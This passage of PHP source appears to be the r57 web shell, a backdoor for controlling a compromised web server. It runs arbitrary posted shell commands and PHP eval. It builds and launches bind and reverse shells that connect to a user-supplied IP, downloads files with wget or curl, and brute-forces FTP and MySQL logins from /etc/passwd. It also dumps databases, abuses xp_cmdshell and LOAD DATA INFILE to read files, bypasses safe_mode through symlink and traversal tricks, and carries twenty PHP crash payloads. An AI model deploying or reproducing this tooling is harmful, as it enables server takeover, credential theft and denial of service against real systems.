2005.       if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
2006.       $_POST['cmd']="";
2007.       }
2008.      break;
2009.    }
2010.  }
2011.  
2012.  
2013. if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
2014. {
2015. if(!$_POST['file_name_r'])
2016.  {
2017.   $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
2018.   $datar = @strtotime($datar);
2019.   @touch($_POST['file_name'],$datar,$datar);}
2020. else{
2021.   @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
2022. }
2023. $_POST['cmd']="";
2024. }
2025.  
2026.  
2027. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
2028.  {
2029.  if(!$file=@fopen($_POST['e_name'],"r+")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); $only_read = 1; }
2030.  if($file=@fopen($_POST['e_name'],"r")) { $filedump = @fread($file,@filesize($_POST['e_name'])); @fclose($file); }
2031.  else if ($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
2032.  if(isset($_POST['cmd']))
2033.  {
2034.  echo $table_up3;
2035.  echo $font;
2036.  echo "<form name=save_file method=post>";
2037.  echo ws(3)."<b>".$_POST['e_name']."</b>";
2038.  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
2039.  echo @htmlspecialchars($filedump);
2040.  echo "</textarea>";
2041.  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
2042.  echo "<input type=hidden name=dir value=".$dir.">";
2043.  echo "<input type=hidden name=cmd value=save_file>";
2044.  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
2045.  echo "</div>";
2046.  echo "</font>";
2047.  echo "</form>";
2048.  echo "</td></tr></table>";
2049.  exit();
2050.  }
2051.  }
2052. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
2053.  {
2054.  $mtime = @filemtime($_POST['e_name']);
2055.  if((!$file=@fopen($_POST['e_name'],"w")) && (!function_exists('file_put_contents'))) { err(0,$_POST['e_name']); }
2056.  else {
2057.  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
2058.  @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
2059.  @touch($_POST['e_name'],$mtime,$mtime);
2060.  $_POST['cmd']="";
2061.  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
2062.  }
2063.  }
2064.  
2065.  
2066. if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
2067. {
2068.  cf("/tmp/prxpl",$prx_pl);
2069.  $p2=which("perl");
2070.  $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
2071.  $_POST['cmd']="ps -aux | grep prxpl";
2072. }
2073. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
2074. {
2075.  cf("/tmp/bd.c",$port_bind_bd_c);
2076.  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
2077.  @unlink("/tmp/bd.c");
2078.  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
2079.  $_POST['cmd']="ps -aux | grep bd";
2080. }
2081. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
2082. {
2083.  cf("/tmp/bdpl",$port_bind_bd_pl);
2084.  $p2=which("perl");
2085.  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
2086.  $_POST['cmd']="ps -aux | grep bdpl";
2087. }
2088. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
2089. {
2090.  cf("/tmp/back",$back_connect);
2091.  $p2=which("perl");
2092.  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
2093.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
2094. }
2095. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
2096. {
2097.  cf("/tmp/back.c",$back_connect_c);
2098.  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
2099.  @unlink("/tmp/back.c");
2100.  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
2101.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
2102. }
2103. if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
2104. {
2105.  cf("/tmp/dp",$datapipe_pl);
2106.  $p2=which("perl");
2107.  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
2108.  $_POST['cmd']="ps -aux | grep dp";
2109. }
2110. if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
2111. {
2112.  cf("/tmp/dpc.c",$datapipe_c);
2113.  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
2114.  @unlink("/tmp/dpc.c");
2115.  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
2116.  $_POST['cmd']="ps -aux | grep dpc";
2117. }
2118.  
2119. if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
2120.  
2121. for($upl=0;$upl<=16;$upl++)
2122. {
2123.  if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
2124.   if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
2125.   else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
2126.   @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
2127.   or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
2128.  }
2129. }
2130.  
2131. if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
2132. {
2133.  switch($_POST['with'])
2134.  {
2135.  case 'fopen':
2136.  $datafile = @implode("", @file($_POST['rem_file']));
2137.  if($datafile)
2138.   {
2139.    $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
2140.    if($w_file)
2141.    {
2142.     @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
2143.     @fclose($w_file);
2144.    }
2145.   }
2146.  $_POST['cmd'] = '';
2147.  break;
2148.  case 'wget':
2149.  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
2150.  break;
2151.  case 'fetch':
2152.  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
2153.  break;
2154.  case 'lynx':
2155.  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
2156.  break;
2157.  case 'links':
2158.  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
2159.  break;
2160.  case 'GET':
2161.  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
2162.  break;
2163.  case 'curl':
2164.  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
2165.  break;
2166.  }
2167. }
2168. if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
2169.  {
2170.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
2171.  if(empty($ftp_port)) { $ftp_port = 21; }
2172.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
2173.  if(!$connection) { err(3); }
2174.  else
2175.   {  
2176.   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
2177.   else
2178.    {
2179.    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
2180.    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
2181.    }
2182.   }
2183.  @ftp_close($connection);
2184.  $_POST['cmd'] = "";
2185.  }
2186.  
2187. if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
2188.  {
2189.  if($_POST['cmd']=="ftp_brute"){
2190.   list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
2191.   if(empty($ftp_port)) { $ftp_port = 21; }
2192.   $connection = @ftp_connect ($ftp_server,$ftp_port,10);
2193.  }else if($_POST['cmd']=="db_brute"){
2194.    $connection = 1;
2195.  }
2196.  if(!$connection) { err(3); $_POST['cmd'] = ""; }
2197.  else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
2198.  else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
2199.  if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
2200.  }
2201.  
2202. echo $table_up3;
2203. if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
2204. else if(empty($_POST['cmd']) && ($safe_mode || $open_basedir)){ $_POST['cmd']="safe_dir"; }
2205. echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
2206. if($safe_mode || $open_basedir)
2207. {
2208.  switch($_POST['cmd'])
2209.  {
2210.  case 'safe_dir':
2211.   $d=@dir($dir);
2212.   if ($d)
2213.    {
2214.    while (false!==($file=$d->read()))
2215.     {
2216.      if ($file=="." || $file=="..") continue;
2217.      @clearstatcache();
2218.      @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
2219.      if(!$unix){
2220.      echo date("d.m.Y H:i",$mtime);
2221.      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
2222.      }
2223.      else{
2224.      if(@function_exists('posix_getpwuid')){
2225.       $owner = @posix_getpwuid($uid);
2226.       $grgid = @posix_getgrgid($gid);
2227.      }else{$owner['name']=$grgid['name']='';}
2228.      echo $inode." ";
2229.      echo perms(@fileperms($file));
2230.      @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
2231.      echo date("d.m.Y H:i ",$mtime);
2232.      }
2233.      echo "$file\n";
2234.     }
2235.    $d->close();
2236.    }
2237.   else if(@function_exists('glob'))
2238.    {
2239.        function eh($errno, $errstr, $errfile, $errline)
2240.         {
2241.           global $D, $c, $i;
2242.           preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
2243.           if($o){ $D[$c] = $o[2]; $c++;}
2244.         }
2245.        $error_reporting = @ini_get('error_reporting');
2246.        error_reporting(E_WARNING);
2247.        @ini_set("display_errors", 1);
2248.        $root = "/";
2249.        if($dir) $root = $dir;
2250.        $c = 0; $D = array();
2251.        @set_error_handler("eh");
2252.        $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
2253.        for($i=0; $i < strlen($chars); $i++)
2254.        {
2255.         $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
2256.         $prevD = $D[count($D)-1];
2257.         @glob($path."*");
2258.         if($D[count($D)-1] != $prevD)
2259.          {
2260.            for($j=0; $j < strlen($chars); $j++)
2261.            {
2262.             $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
2263.             $prevD2 = $D[count($D)-1];
2264.             @glob($path."*");
2265.             if($D[count($D)-1] != $prevD2)
2266.              {
2267.               for($p=0; $p < strlen($chars); $p++)
2268.                {
2269.                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
2270.                 $prevD3 = $D[count($D)-1];
2271.                 @glob($path."*");
2272.                 if($D[count($D)-1] != $prevD3)
2273.                  {
2274.                   for($r=0; $r < strlen($chars); $r++)
2275.                    {
2276.                     $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
2277.                     @glob($path."*");
2278.                    }
2279.                  }        
2280.                }
2281.              }        
2282.            }    
2283.          }
2284.        }
2285.        $D = array_unique($D);
2286.        foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";
2287.        error_reporting($error_reporting);
2288.    }
2289.   else echo $lang[$language.'_text29'];
2290.  break;
2291.   case 'test1':
2292.   $ci = @curl_init("file://".$_POST['test1_file']);
2293.   $cf = @curl_exec($ci);
2294.   echo htmlspecialchars($cf);
2295.   break;
2296.   case 'test2':
2297.   @include($_POST['test2_file']);
2298.   break;
2299.   case 'test3':
2300.   if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
2301.   $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
2302.   if($db)
2303.    {
2304.    if(@mysql_select_db($_POST['test3_md'],$db))
2305.     {
2306.      @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
2307.      @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
2308.      @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
2309.      $r = @mysql_query("SELECT * FROM temp_r57_table");
2310.      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
2311.      @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
2312.     }
2313.     else echo "[-] ERROR! Can't select database";
2314.    @mysql_close($db);
2315.    }
2316.   else echo "[-] ERROR! Can't connect to mysql server";
2317.   break;
2318.   case 'test4':
2319.   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
2320.   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
2321.   if($db)
2322.    {
2323.    if(@mssql_select_db($_POST['test4_md'],$db))
2324.     {
2325.      @mssql_query("drop table r57_temp_table",$db);
2326.      @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
2327.      @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
2328.      $res = mssql_query("select * from r57_temp_table",$db);
2329.      while(($row=@mssql_fetch_row($res)))
2330.       {
2331.       echo htmlspecialchars($row[0])."\r\n";
2332.       }
2333.     @mssql_query("drop table r57_temp_table",$db);
2334.     }
2335.     else echo "[-] ERROR! Can't select database";
2336.    @mssql_close($db);
2337.    }
2338.   else echo "[-] ERROR! Can't connect to MSSQL server";
2339.   break;
2340.   case 'test5':
2341.   $temp=tempnam($dir, "fname");
2342.   if (@file_exists($temp)) @unlink($temp);
2343.   $extra = "-C ".$_POST['test5_file']." -X $temp";
2344.   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
2345.   $str = moreread($temp);
2346.   echo htmlspecialchars($str);
2347.   @unlink($temp);
2348.   break;
2349.   case 'test6':
2350.   $stream = @imap_open('/etc/passwd', "", "");
2351.   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
2352.   for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
2353.   @imap_close($stream);
2354.   break;
2355.   case 'test7':
2356.   $stream = @imap_open($_POST['test7_file'], "", "");
2357.   $str = @imap_body($stream, 1);
2358.   echo htmlspecialchars($str);
2359.   @imap_close($stream);
2360.   break;
2361.   case 'test8':
2362.   $temp=@tempnam($_POST['test8_file2'], "copytemp");
2363.   $str = readzlib($_POST['test8_file1'],$temp);
2364.   echo htmlspecialchars($str);
2365.   @unlink($temp);
2366.   break;
2367.   case 'test9':
2368.   @ini_restore("safe_mode");
2369.   @ini_restore("open_basedir");
2370.   $str = moreread($_POST['test9_file']);
2371.   echo htmlspecialchars($str);
2372.   break;
2373.   case 'test10':
2374.   @ob_clean();
2375.   $error_reporting = @ini_get('error_reporting');
2376.   error_reporting(E_ALL ^ E_NOTICE);
2377.   @ini_set("display_errors", 1);
2378.   $str=fopen($_POST['test10_file'],"r");
2379.   while(!feof($str)){print htmlspecialchars(fgets($str));}
2380.   fclose($str);
2381.   error_reporting($error_reporting);
2382.   break;
2383.   case 'test11':
2384.   @ob_clean();
2385.   $temp = 'zip://'.$_POST['test11_file'];
2386.   $str = moreread($temp);
2387.   echo htmlspecialchars($str);
2388.   break;
2389.   case 'test12':
2390.   @ob_clean();
2391.   $temp = 'compress.bzip2://'.$_POST['test12_file'];
2392.   $str = moreread($temp);
2393.   echo htmlspecialchars($str);
2394.   break;
2395.   case 'test13':
2396.   @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
2397.   echo $lang[$language.'_text61'];
2398.   break;
2399.   case 'test14':
2400.   @session_save_path($_POST['test14_file2']."\0;/tmp");
2401.   @session_start();
2402.   @$_SESSION[php]=$_POST['test14_file1'];
2403.   echo $lang[$language.'_text61'];
2404.   break;
2405.   case 'test15':
2406.   @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
2407.   echo $lang[$language.'_text61'];
2408.   break;
2409.   case 'test16':
2410.   if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
2411.   break;
2412.   case 'test17_1':
2413.   @unlink('symlinkread');
2414.   @symlink('a/a/a/a/a/a/', 'dummy');
2415.   @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
2416.   @unlink('dummy');
2417.   while (1)
2418.    {
2419.     @symlink('.', 'dummy');
2420.     @unlink('dummy');
2421.    }
2422.   break;
2423.   case 'test17_2':
2424.   $str='';
2425.   while (strlen($str) < 3) {  
2426.    $temp = 'symlinkread';
2427.    $str = moreread($temp);
2428.    if($str){ @ob_clean(); echo htmlspecialchars($str);}
2429.   }
2430.   break;
2431.   case 'test17_3':
2432.   $dir = $files = array();
2433.   if(@version_compare(@phpversion(),"5.0.0")>=0){
2434.    while (@count($dir) < 3) {
2435.     $dir=@scandir('symlinkread');
2436.     if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
2437.    }
2438.   }
2439.   else {
2440.    while (@count($files) < 3) {
2441.     $dh  = @opendir('symlinkread');
2442.     while (false !== ($filename = @readdir($dh))) {
2443.      $files[] = $filename;
2444.     }
2445.     if(@count($files) > 2){@ob_clean(); @print_r($files); }
2446.    }
2447.   }
2448.   break;
2449.  }
2450. }
2451. if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
2452.  $cmd_rep = ex($_POST['cmd']);
2453.  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
2454.  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
2455.  
2456. switch($_POST['cmd'])
2457. {
2458.  case 'dos1':
2459.  function a() { a(); } a();
2460.  break;
2461.  case 'dos2':
2462.  @pack("d4294967297", 2);
2463.  break;
2464.  case 'dos3':
2465.  $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
2466.  break;
2467.  case 'dos4':
2468.  $t = array(1);while (1) {$a[] = &$t;};
2469.  break;
2470.  case 'dos5':
2471.  @dl("sqlite.so");$db = new SqliteDatabase("foo");
2472.  break;
2473.  case 'dos6':
2474.  preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
2475.  break;
2476.  case 'dos7':
2477.  @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
2478.  break;
2479.  case 'dos8':
2480.  @shell_exec("killall -11 httpd");
2481.  break;
2482.  case 'dos9':
2483.  function cx(){ @tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();
2484.  break;
2485.  case 'dos10':
2486.  $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
2487.  break;
2488.  case 'dos11':
2489.  @array_fill(1,123456789,"Infigo-IS");
2490.  break;
2491.  case 'dos12':
2492.  @substr_compare("A","A",12345678);
2493.  break;
2494.  case 'dos13':
2495.  @unserialize("a:2147483649:{");
2496.  break;
2497.  case 'dos14':
2498.  $Data = @str_ireplace("\n", "<br>", $Data);
2499.  break;
2500.  case 'dos15':
2501.  function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
2502.  $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
2503.  @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
2504.  break;
2505.  case 'dos16':
2506.  $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
2507.  for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
2508.  unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
2509.  break;
2510.  case 'dos17':
2511.  $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
2512.  $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
2513.  $x = "AQ                                                                        ";
2514.  unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
2515.  break;
2516.  case 'dos18':
2517.  $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
2518.  if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
2519.  echo "Msg not sent because $msg_err\n";
2520.  if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
2521.  echo "$msg\n";
2522.  } else { echo "Received $msg_error fetching message\n"; break; }
2523.  @msg_remove_queue ($msg_id);
2524.  break;
2525.  case 'dos19':
2526.  $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
2527.  break;
2528.  case 'dos20':
2529.  $hashtable = str_repeat("A", 39);
2530.  $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
2531.  $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
2532.  $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
2533.  for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
2534.  $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
2535.  @unserialize($str);
2536.  break;
2537. }
2538.  
2539. if ($_POST['cmd']=="php_eval"){
2540.  $eval = @str_replace("<?","",$_POST['php_eval']);
2541.  $eval = @str_replace("?>","",$eval);
2542.  @eval($eval);}
2543.  
2544. if ($_POST['cmd']=="ftp_brute")
2545.  {
2546.  $suc = 0;
2547.  if($_POST['brute_method']=='passwd'){
2548.  foreach($users as $user)
2549.   {
2550.     $connection = @ftp_connect($ftp_server,$ftp_port,10);
2551.     if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
2552.     else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2553.     @ftp_close($connection);
2554.   }
2555.  }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
2556.   foreach($users as $user)
2557.   {
2558.     $connection = @ftp_connect($ftp_server,$ftp_port,10);
2559.     if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
2560.     @ftp_close($connection);
2561.   }
2562.  }
2563.  echo "\r\n-------------------------------------\r\n";
2564.  $count = count($users);
2565.  if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
2566.  echo $lang[$language.'_text97'].$count."\r\n";
2567.  echo $lang[$language.'_text98'].$suc."\r\n";
2568.  }
2569.  
2570. if ($_POST['cmd']=="db_brute")
2571.  {
2572.  $suc = 0;
2573.  if($_POST['brute_method']=='passwd'){
2574.  foreach($users as $user)
2575.   {
2576.    $sql = new my_sql();
2577.    $sql->db   = $_POST['db'];
2578.    $sql->host = $_POST['db_server'];
2579.    $sql->port = $_POST['db_port'];
2580.    $sql->user = $user;
2581.    $sql->pass = $user;
2582.    if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
2583.   }
2584.  if(isset($_POST['reverse']))
2585.   {
2586.    foreach($users as $user)
2587.     {
2588.      $sql = new my_sql();
2589.      $sql->db   = $_POST['db'];
2590.      $sql->host = $_POST['db_server'];
2591.      $sql->port = $_POST['db_port'];
2592.      $sql->user = $user;
2593.      $sql->pass = strrev($user);
2594.      if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
2595.     }
2596.   }
2597.  }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
2598.   foreach($users as $user)
2599.   {
2600.    $sql = new my_sql();
2601.    $sql->db   = $_POST['db'];
2602.    $sql->host = $_POST['db_server'];
2603.    $sql->port = $_POST['db_port'];
2604.    $sql->user = $_POST['mysql_l'];
2605.    $sql->pass = $user;
2606.    if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
2607.   }
2608.  }
2609.  echo "\r\n-------------------------------------\r\n";
2610.  $count = count($users);
2611.  if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
2612.  echo $lang[$language.'_text97'].$count."\r\n";
2613.  echo $lang[$language.'_text98'].$suc."\r\n";
2614.  }
2615.  
2616. if ($_POST['cmd']=="mysql_dump")
2617.  {
2618.   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
2619.   $sql = new my_sql();
2620.   $sql->db   = $_POST['db'];
2621.   $sql->host = $_POST['db_server'];
2622.   $sql->port = $_POST['db_port'];
2623.   $sql->user = $_POST['mysql_l'];
2624.   $sql->pass = $_POST['mysql_p'];
2625.   $sql->base = $_POST['mysql_db'];
2626.   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
2627.   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
2628.   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
2629.   else {
2630.    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
2631.    else if($fp || @function_exists('file_put_contents')){ foreach($sql->dump as $v){ @fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");} }
2632.    else { echo "[-] ERROR! Can't write in dump file"; }
2633.    }
2634.  }
2635.  
2636. echo "</textarea></div>";
2637. echo "</b>";
2638. echo "</td></tr></table>";
2639. echo "<table width=100% cellpadding=0 cellspacing=0>";
2640.  
2641. function div_title($title, $id)
2642. {
2643.   return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
2644. }
2645. function div($id)
2646.  {
2647.  if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
2648.  $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
2649.  if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
2650.  return '<div id="'.$id.'">';
2651.  }
2652.  
2653. if(!$safe_mode){
2654. echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
2655. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
